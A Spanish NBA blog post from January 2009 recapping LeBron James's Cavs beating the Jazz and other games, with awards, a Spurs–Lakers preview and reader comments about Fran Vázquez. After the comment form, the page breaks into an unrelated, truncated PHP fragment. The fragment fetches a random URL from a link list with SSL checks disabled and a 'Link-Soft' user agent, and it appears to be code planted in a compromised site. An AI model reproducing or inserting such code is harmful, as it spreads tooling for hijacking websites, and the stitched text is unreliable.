La crónica (24/1/2009)

25 de January de 2009 por Jabho

Comentaba ayer Lluskas que estamos ante el mejor LeBron de la historia. Pues si, sin duda. Anoche de nuevo sus Cavs ganaron a los Jazz en el siempre difícil Sant Lake City. Sufrieron porque el partido fue igualado hasta el último momento, pero ganaron y LeBron jugó de nuevo un partidazo. Los Cavs son líderes de conferencia, empatados en el primer puesto de la liga y LeBron el más claro aspirante a MVP. Empezó el año jugando menos y monopolizando menos el juego. Pero las lesiones de sus compañeros han sacado lo mejor de él para que el equipo siga ganado. Empieza a verse, además, un muy buen entendimiento con Mo Williams. Por los Jazz Deron y Millsap lo intentaron pero la baja de Kirilenko que se hubiera emparejado en defensa con James fue clave. Y aun así Okur tuvo un triple que hubiera empatado el partido a falta de 18 segundos. Falló y el partido acabó para los Jazz.

Otro punto de atención anoche era Iguodala. Decíamos que sus Sixers tenían la obligación de ganar y lo hicieron en el Madison ante los Knicks. Ya están 21-21 y anoche reapareció Brand, que jugó poquito pero bien. Iguodala fue el mejor de otro partido que fue igualado en todo momento, y es que anoche si entraron los triples de los de D´Antoni. En la ausencia de Brand hemos visto muy buenos partidos de Young, y esperamos seguir viéndolos.

El duelo entre los dos equipos de Florida se lo llevaron los Heat ante los Magic, que suman así su 2ª derrota consecutiva. Los Heat, como siempre, tiraron de Wade y anoche del novato Chalmers. En los Magic echaron de menos alguna ayuda del banco. En otro partido muy igualado la diferencia la marcaron las sólo 4 perdidas de balón de los Miami.

Los Nets tenían anoche la ocasión propicia para frenar su racha de 5 derrotas seguidas y lo hicieron ganando a los Grizzlies. ¿Que Mayo, y Rose, no son los de principio de temporada? Pues últimamente es así, pero hay que recordar que la temporada de los rookies se suele hacer muy larga a partir de este mes (el rookie wall) y no es fácil jugar bien en tu primer año cuando eres el lider del equipo. Anoche mejor Mayo aunque a los ositos no les valió para mucho. Marc salvó la cara con un doble-doble y por parte de su equipo muy poco más. En los Nets partido interesante, y no es el primero, de Ryan Anderson.

Mas de partidos igualados, el que se llevaron los Bucks ante los Kings a pesar de la lesión de Redd en el tercer cuarto. Lesión de rodilla que habrá que esparar hasta hoy para saber su alcance. Brad Miller rozó el triple-doble y tuvo en sus manos un tiro para llevar el partido a la prórroga.

Acabamos con la victoria de los Blazers ante los Wizards. Sergio jugó un buen partido saliendo de titular. Por contra muy mala noche de Rudy, 2 de 11, saliendo desde el banco. Butler, cuando no es él es Jamison, luchó contra los elementos. James y Mcguire, titulares por los Wizards, se combinaron para hacer un 0-6 en tiro y perder 8 balones en 62 minutos entre ambos.

PREMIOS

MVP: No hay discusión aunque toque repetir, LeBron El Elegido James. Anoche 33 puntos, 14 rebotes y 9 asistencias. Juega bien, hace números y el equipo gana.

Rookie:  Actuaciones interesantes las de Thompson, Gasol, Anderson o Mbah a Moute. Pero para el premio la duda es entre los 20 puntos y 6 asistencias de Chalmers, importantísimos en la victoria de los Heat y los 18 puntos y 14 rebotes de Oden ante los Wizards. No está el juego interior de los Wizards para tirar cohetes y sin embargo Chalmers tuvo que lidiar con Nelson. Premio para el heat.

La sorpresa: Llaman la atención los 10 robos de balón de Roy y los 33 minutos bien aprovechados que le dió McMillan a Sergio. Para el premio me quedo con Paco Elson que “tapó” la ausencia de Bogut con 10 puntos, 12 rebotes, 5 robos, 2 tapones y 2 asistencias.

La decepción: Pasamos de largo a los habituales por aquí Wizards, no por falta de motivos, y nos quedamos con 2 malas actuaciones. Rudy tuvo anoche un mal partido y casi le dá para ganar. Pero me quedo con Okur, que además de jugar muy mal falló un tiro que podía haber llevado a su equipo a la prórroga.

El Mayo Esfuerzo en Vano: El de Butler, que a saber como tiene ganas de seguir esforzándose, estuvo cerca de ganar anoche. Pero los partidazos de Millsap y Deron con los Jazz, nadar para morir en la orilla, duelen…

Razones para trasnochar

No hay que trasnochar mucho para ver el partidazo de la jornada.

Spurs@Lakers: A las 9:30 hora española los Spurs visitan a los Lakers. Los Spurs vencieron hace poco a los Lakers en la visita de estos a Texas, ambos son primero y segundos de la conferencia, y con la final de conferencia del año pasado en el recuerdo y la de este en el horizonte, la victoria en estos duelos tiene  un transfondo de golpe moral al adversario. Además Parker, Manu y Duncan contra Kobe, Gasol y compañía. Popovich contra Jackson. El que no encuentre razones es que no quiere verlas…

Y el jugador al que conviene seguir de cerca es… Gerald Wallace. Sonó como transferible y en los últimos 5 partidos está promediando 19.8 puntos, 9.4 rebotes, 4.4 asistencias, 2.4 robos y 1.4 tapones. Está fino y su equipo, los Bobcats, juegan ante los Pacers con la necesidad de ganar y seguir acercándose a Play Offs. Bonito duelo de Wallace con Granger.

Comenta

5 comentarios a esta entrada

  1. kantonyo dice:
    #1

    Hace unas semanas preguntabais que jugador de la acb podría llegar a triunfar en la nba, http://blog.tjnba.com/2008/12/28/la-cronica-27122008/

    Viendo las últimas actuaciones de Fran Vazquez y teniendo en cuenta que siempre ha gustado mucho al otro lado del oceano, habría que contar con él. Aunque su negativa a recalar en Orlando despues de ser elegido en el puesto 11 del draft de 2005, es su mayor handicap.

    Por cierto he estado un poco empanado, y no me habia enterado del despido de Iavaroni hasta hoy. Yo me alegro bastante, ya que creo que no ha aportado nada bueno a la franquicia. Aunque segun he leido no parece que en Memphis busquen grandes cambios, y estan buscando un segundon para el cargo.

      Citar

  2. Jabho dice:
    #2

    No puedo estar mas de acuerdo Kantonyo. Hoy estaba en directo en la Fonteta y me ha impresionado Vazquez. De hecho él ha ganado el partido dominando la zona en ambos lados. Que potencia… una pena que no sea más regular porque no es entendible que ni juegue en la selección pudiendo jugar como lo ha hecho hoy. En fin, mucha irregularidad la de Vazquez y parece que no muy buena cabeza.

      Citar

  3. Fran Reyes dice:
    #3

    Tres cosas a comentar:

    1) Fanfarronada de Alexander, a quien no le ha “molado” (según Mundo Deportivo) que Rudy sea el elegido para el concurso de mates. Dice que él podría haberlo hecho mejor.

    2) Kobe Bryant está en plan grande en el Lakers-Spurs, lleva muy buenos números y jugadas dignas del crack que es. Gasol está haciendo una actuación decente, mientras que a Walton se le ve participativo e incluso efectivo después de su lesión.

    3) En Boston, victoria para los Celtics sobre los Mavericks con un 53% de aciertos en tiros de campo para los verdes, que han hecho dos primeros cuartos arrolladores y después han dejado a Eddie House y la tercera unidad llevar el peso del partido.

      Citar

  4. couxe dice:
    #4

    Sobre Fran Vázquez, solamente apuntar que si no está en la selección, no es tanto por deméritos suyos, sino más bien por lo que tiene delante… Gasol & Gasol y Felipe Reyes, están muy por encima del nivel de Vázquez, y seguramente el seleccionador prefiere llevar a estos 3 como pívot puro, y tener a otros jugadores versátiles que puedan actuar tanto de 3 como de 4, que son Jimenez, Mumbrú y Garbajosa… Y con 6 tíos que te cubran posiciones interiores, la cosa está más que cubierta…

    Me parece bastante probable que tras la decisión de Jiménez de dejar la selección, tenga muchas más opciones de llegar a la selección, sobre todo porque también está jugando mejor que años atrás… Pero vamos, Vázquez por nivel estaría en cualquier otra selección europea, incluso siendo el titular en la imensa mayoría…

      Citar

  5. RusticoColorao dice:
    #5

    Yo creo más bien que hay razones extradeportivas en el tema Vázquez-selección

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>